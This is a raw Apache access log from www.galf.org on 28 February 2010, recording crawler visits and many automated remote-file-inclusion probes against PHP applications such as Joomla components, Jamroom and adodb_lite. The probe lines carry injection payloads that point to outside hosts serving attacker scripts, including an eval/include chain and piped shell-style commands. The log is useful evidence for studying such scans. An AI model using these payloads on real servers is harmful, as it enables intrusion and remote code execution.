78.110.50.120 - - [28/Feb/2010:23:12:03 -0800] "GET /logs/access_100215.log//component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.justice.gov.ge/_cache_img/lc1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.249.65.246 - - [28/Feb/2010:23:12:04 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.galf.org"
66.249.65.246 - - [28/Feb/2010:23:12:04 -0800] "GET /LABIA23/libro1.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:23:13:19 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:02 -0800] "GET /?D=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:02 -0800] "GET /?M=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:03 -0800] "GET /?S=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:04 -0800] "GET /cendoc/?D=D HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:05 -0800] "GET /cendoc/?S=D HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:06 -0800] "GET /labia/?S=D HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:06 -0800] "GET /logs/access_090720.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:07 -0800] "GET /logs/access_090803.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:09 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
208.115.111.245 - - [28/Feb/2010:23:14:15 -0800] "GET /logs/access_091102.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:15:11 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:15:11 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:15:11 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:19:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:25:53 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:23:29:20 -0800] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:30:21 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:30:21 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:30:21 -0800] "GET /logs/access_091123.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:30:30 -0800] "GET /logs/access_091221.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:30:31 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:30:31 -0800] "GET /logs/access_091102.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:30:32 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:31:38 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:31:38 -0800] "GET /logs/access_100111.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:31:38 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.219.132 - - [28/Feb/2010:23:32:02 -0800] "GET /logs/access_100104.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:32:20 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:32:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:32:20 -0800] "GET /logs/access_091109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:32:24 -0800] "GET /logs/access_100111.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:33:04 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:33:04 -0800] "GET /logs/access_091102.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:33:05 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:33:11 -0800] "GET /logs/access_091123.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:39 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:39 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:39 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:42 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:43 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:33:43 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:34:30 -0800] "GET /logs/access_090831.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
208.80.193.29 - - [28/Feb/2010:23:34:42 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; {FDF10BAB-3B95-F10C-A5F8-C9CD1C5BCEC6}; MEGAUPLOAD 1.0)" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:34:48 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:35:12 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:35:12 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:23:35:12 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:35:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:35:35 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
218.55.227.132 - - [28/Feb/2010:23:35:46 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:23:35:51 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "galf.org"
222.122.25.99 - - [28/Feb/2010:23:35:56 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "galf.org"
80.247.64.150 - - [28/Feb/2010:23:36:26 -0800] "GET /logs/access_091102.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:36:39 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:36:39 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:36:39 -0800] "GET /logs/access_100104.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:36:42 -0800] "GET /logs/access_091123.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:36:56 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:36:56 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:36:56 -0800] "GET /logs/access_091102.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:37:36 -0800] "GET /logs/access_100104.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:37:36 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:37:36 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [28/Feb/2010:23:37:44 -0800] "GET /logs/access_091123.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?%20%7C%20.crespon2%20http://www.yuiworld.kr/bbs/data/sonota/id2.txt?%20%7C%20.cshell%20http://www.yuiworld.kr/bbs/data/sonota/cu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:37:49 -0800] "GET /logs/access_091221.log%20%20//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:39:18 -0800] "GET /adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:39:18 -0800] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:39:18 -0800] "GET /logs/access_090824.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:39:27 -0800] "GET /logs/access_091116.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.140.23.24 - - [28/Feb/2010:23:39:32 -0800] "GET /logs/access_091221.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:39:35 -0800] "GET /logs/access_100104.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:39:36 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:39:36 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:23:40:00 -0800] "GET /logs/access_090907.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:40:10 -0800] "GET /logs/access_100104.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [28/Feb/2010:23:40:11 -0800] "GET /logs/access_100118.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:23:41:04 -0800] "GET /logs/access_090907.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:41:51 -0800] "GET /logs/access_100104.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.247.64.150 - - [28/Feb/2010:23:41:55 -0800] "GET /logs/access_100118.log//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:42:59 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:43:00 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:43:00 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
218.55.227.145 - - [28/Feb/2010:23:43:39 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [28/Feb/2010:23:43:39 -0800] "GET /logs/access_091102.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [28/Feb/2010:23:43:39 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [28/Feb/2010:23:43:47 -0800] "GET /logs/access_091123.log%20%20//purchase.php?jamroom[jm_dir]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:44:18 -0800] "GET /logs/access_100201.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:44:19 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:44:19 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:16 -0800] "GET /logs/access_091221.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:16 -0800] "GET /logs/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:16 -0800] "GET /setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:17 -0800] "GET /setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:17 -0800] "GET /logs/access_091221.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:45:17 -0800] "GET /logs/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:46:15 -0800] "GET /logs/access_100104.log//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:46:15 -0800] "GET /_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:23:46:16 -0800] "GET /logs//_head.php?_zb_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:46:16 -0800] "GET /logs/access_091116.log/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:46:16 -0800] "GET /logs/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:46:16 -0800] "GET /error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.234.201.2 - - [28/Feb/2010:23:46:16 -0800] "GET /logs/access_090713.log/error.php?dir=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [28/Feb/2010:23:47:18 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:47:19 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
110.45.145.178 - - [28/Feb/2010:23:47:19 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
216.104.40.170 - - [28/Feb/2010:23:47:58 -0800] "GET /logs/access_091102.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:23:48:15 -0800] "GET /logs/access_091102.log%20%20/setup.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:48:31 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:23:48:40 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
